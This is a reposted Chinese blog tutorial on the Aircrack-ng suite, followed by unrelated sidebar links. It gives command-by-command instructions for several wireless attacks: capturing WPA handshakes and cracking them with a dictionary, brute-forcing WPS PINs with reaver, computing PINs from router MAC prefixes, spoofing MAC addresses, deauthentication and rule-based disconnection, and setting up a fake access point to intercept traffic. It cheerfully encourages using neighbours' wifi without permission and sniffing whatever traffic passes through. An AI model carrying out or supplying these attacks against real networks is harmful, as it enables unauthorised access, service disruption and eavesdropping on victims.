Aircrack的简单使用
来源:互联网 发布:数据库用什么软件好 编辑:程序博客网 时间:2024/06/10 19:41
暴力破解法
何为暴力破解呢,其实就是一个一个密码试,直到正确的密码为止。
现在的wifi一般加密都是:
1、不启用安全2、WEP
3、WPA/WPA2-PSK(预共享密钥)
4、WPA/WPA2 802.1X (radius认证)
进入正题:
第一步:
进入kali启动终端输入如下:
root@kali:~# airmon-ng
看看网卡信息
第二步:
输入:
airmon-ng start wlan0
监听窗口
第三步:
输入:
airodump-ng mon0
扫描wifi信号
这里我用自己家wifi做实验
第四步:
这是我家wifi:
上图可以看出
BSSID是00:0F:32:A0:99:DC 信道(CH)是:1
输入:
airodump-ng -w freedom -c CH --bssid 00:0F:32:A0:99:DC mon0 --ignore-negative-one
解释:CH表示信道,信道是多少就填多少,freedom是一会抓握手包的文件名字,他会自动生成一个freedom.cap的文件,这个名字随便你们填什么
00:0F:32:A0:99:DC 64:5A:04:BB:54:57 -4 0e- 0e 0 400
00:0F:32:A0:99:DC 这个是路由器的mac
64:5A:04:BB:54:57 这个是客户端的mac
第五步:
重新开一个客户端输入命令:
aireplay-ng --deaut 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 --ignore-negative-one
掉线了,当我们重新连接抓到握手包
第六步:
破解握手包:
命令如下:
aircrack-ng -w mi freedom-*.cap
解释:mi字典名字 freedom-*.cap
abc123abc这个就是我的wifi密码
破解完成,成功与否靠强大的字典和运气了,希望各位亲们蹭网愉快!!!
通过pin码破解
这个方法很简单:
第一步:Wash 扫描开启WPS的网络。
wash -i mon1 –C
小编的周围没有开启wps功能我wifi,就会出现上图那样,这样咋办呢
不要急,因为有些隐藏了起来,我们直接霸王硬上弓
用前面那个扫wifi的命令:
airodump-ng mon0
看见小编圈起来的mac没有,选择一个PWR的值的绝对值小于70的wifi破解
第二步:
我在这选择的是名字为:FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E -45 2 0 0 6 54e. WPA2 CCMP PSK FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 这个mac根据路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E
如图上表示可以破解,开启了wps功能
出现上图这样,就表示不能破解换其他wifi破解吧孩子
这样就表示破解出来了
小知识:
如果密码被改了你知道他wifi的pin码就用如下命令:reaver-i mon0 -b MAC -p PIN
pin码有8位:所以就是10的8次方,要穷举1000000000次
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。
有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。
比如这个:bssid :Tenda_579A18 mac :C8:3A:35:57:9A:18 通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!
破解时推荐这个命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因为–d9 –t9参数可以防止pin死路由器。
原文:www.secbox.cn/hacker/wireless/4877.html
Aircrack的其他玩法
Aircrack这种屌爆了的攻击测试套件在网上居然只有用它破解WiFi密码的教程,在这里我来扒个冷门,介绍下这款杀器的其他一些有趣的玩法。
0×00:首先你需要一张usb无线网卡
ifconfig查看可以正常识别,如果不行看这里。
0×01:干坏或者不坏的事情前先修改MAC
ifconfig [INTERFACE] down#关闭网卡
#[INTERFACE]是指你的无线网卡,一般为wlan0,下不再说明
macchanger -m [MAC] [INTERFACE]#修改MAC,[MAC]是你要改为的MAC地址,后面是你的网卡
#可以macchanger –help查看帮助信息
ifconfig [INTERFACE] up#打开网卡
0×02:把无线网卡切换到监听模式
#首先ifconfig可以看见有无线网卡然后
ifconfig wlan0 down #wlan0可能需要更换为你的网卡,一般默认都为wlan0airmon-ng #查看当前网卡情况airmon-ng start wlan0airmon-ng #查看是否打开成功ifconfig wlan0 up
iwconfig mon0 #查看Mode是不是Monitor(监听模式)
停止的命令:
airmon-ng stop mon0
0×03:获取/保存当前环境的WiFi信息
airodump-ng mon0 #收集wifi范围内的所有无线信息,Ctrl+c停止
#BSSID是mac地址,PWR是信号强度,后面是收集到的数据量,CH是信道,再后面是加密方式和ESSID
#见下图
#语法:airodump-ng –channel [x] –bssid [bssid] –write [filename] [interface?mon0]
#在我的环境下,命令如下
airodump-ng --channel 11 --bssid 24:05:0F:22:EF:82 --write babylove mon0
#将会把文件保存在当前目录下,一filename-01命名的三个文件,可以不加–write和参数,将不保存
0×04:初级断网攻击
#也就是传说的Deauthentication攻击
airodump-ng --channel 11 --bssid 24:05:0F:22:EF:82 mon0#查看当前环境的WiFi连接情况
aireplay-ng --deauth 10000 -a 24:05:0F:22:EF:82 -c 84:A6:C8:77:FF:F6 mon0 #对目标实现攻击
#见下图
#根据需要可以添加参数-e 11 –ignore-negative-one
#指定信道,忽略错误
#见下图
0×05:高级断网攻击
#可以自定义一个规则文件,是这个规则下的目标无法连接到WiFi网络,首先确保你的Aircrack套件中包含airdrop-ng,如下图测试:
#创建一个文件,airdeo-rules.txt,
#简单说来这个文件只保存三个参数,第一个参数a或者d,表示可以连接或者拒绝第三个参数所表示的客户机连接到第二个参数所表示的AP;
#第一个和第二个参数用/连接;
#第二个参数是AP的MAC地址,可以使any就是我们无线网卡所能监测到的所有热点;
#第二个和第三个参数用|链接;
#第三个参数是客户机的MAC地址,可以使any或者是Apple, Inc;APPLE COMPUTER;APPLE COMPUTER, INC.;Apple Computer Inc.;APPLE COMPUTER INC.;APPLE, INC等,来是的这些客户允许或者拒绝链接AP。
#创建好文件后保存在当前目录下,就是收集到的信息保存的目录中,一般为home中。
airodump-ng --write airdrop-test-file --output-format csv mon0
#收集到足够多的信息后ctrl+c
#airodump-ng 攻击并将数据保存在airdrop-test-file-01.csv的文件里
airdrop-ng -t airdrop-test-file-01.csv -r airdeo-rules.txt -i mon0
#使用airdrop攻击,调用前面收集到的信息文件,使用刚才穿件的rules规则和mon0网卡攻击。
0×06:最叼叼的部分,虚假AP/MITM攻击
#安装简单的dns服务
apt-get install dnsmasq
#确认有/etc/dnsmasq.conf,并如下写入服务规则
echo -e "interface=at0\ndhcp-range=192.168.0.50,192.168.0.150,12h" > /etc/dnsmqsq.conf
#开启AP语法:airbase-ng -e [network name] -c [channel] [interface]
airbase-ng -e fake-ap -c 6 mon0
现在应该就已经可以搜到虚假ap了,不过还连接不上。
新开启一个终端:
ifconfig at0 192.168.0.1 up
#设置iptables的转发规则
iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainiptables -P FORWARD ACCEPT
#把虚假AP的无线网卡和我们正常上网的网卡关联,是连接到虚假AP的人可以上网
iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADEiptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
#开启dns服务
dnsmasqecho "1" > /proc/sys/net/ipv4/ip_forward
#如果出现Got channel -1, expected a value > 0.错误,执行:
#ifconfig wlan0 down
#也就是关掉用来开启嗅探模式的那个网卡就行
#在新的终端里执行完命令后其他终端就可以连接上虚假AP了,如下图
#然后打开Wireshark开始抓吧(注意选择at0或者你指定的哪个虚假AP的网卡),所有流量都是通过你的虚假AP走的,如下图.
还不是想抓什么抓什么,玩玩中间人不也很好~
原文:http://www.freebuf.com/articles/wireless/59809.html
- Aircrack的简单使用
- Aircrack-ng套件简单使用
- aircrack使用
- aircrack使用
- Ubuntu下Aircrack-ng工具包的使用
- Ubuntu下Aircrack-ng工具包的使用
- aircrack-ng在嵌入式系统的使用
- 无线渗透 aircrack-ng的使用
- Aircrack-ng 简单的WEP加密破解(上)
- Aircrack-ng 简单的WEP加密破解(下)
- Ubuntu使用aircrack-ng
- Aircrack-ng 使用 【转载】
- Linux : CentOS 使用aircrack-ng
- Aircrack-ng的一些记录
- aircrack-ng的安装详解
- Kali Linux 2.0中使用aircrack-ng破解安全性为WPA/WPA2 PSK的无线网络
- 使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。
- Linux 网络渗透 如何使用Aircrack-ng 系列工具进行WPA/WPA2的监听和破解
- 您正在通过不兼容的虚拟化管理程序运行 VMware Workstation。禁用此虚拟化管理程序后才能开启虚拟机
- Linux学习--磁盘分区与挂载
- 大数据江湖之即席查询与分析(上篇)--即席查询与分析的前世今生
- 线程池的原理及实现
- poj 2752Seek the Name,Seek the Fame(KMP)
- Aircrack的简单使用
- valarray类
- License Key Formatting
- csdn中让图片居中
- C++第一次实验博客:项目3 项目5
- 大数据江湖之即席查询与分析(中篇)--即席查询与分析的典型场景
- Android6.0权限封装
- 用MVC6写webapi,添加model校验过滤器
- 大数据江湖之即席查询与分析(下篇)--手把手教你搭建即席查询与分析Demo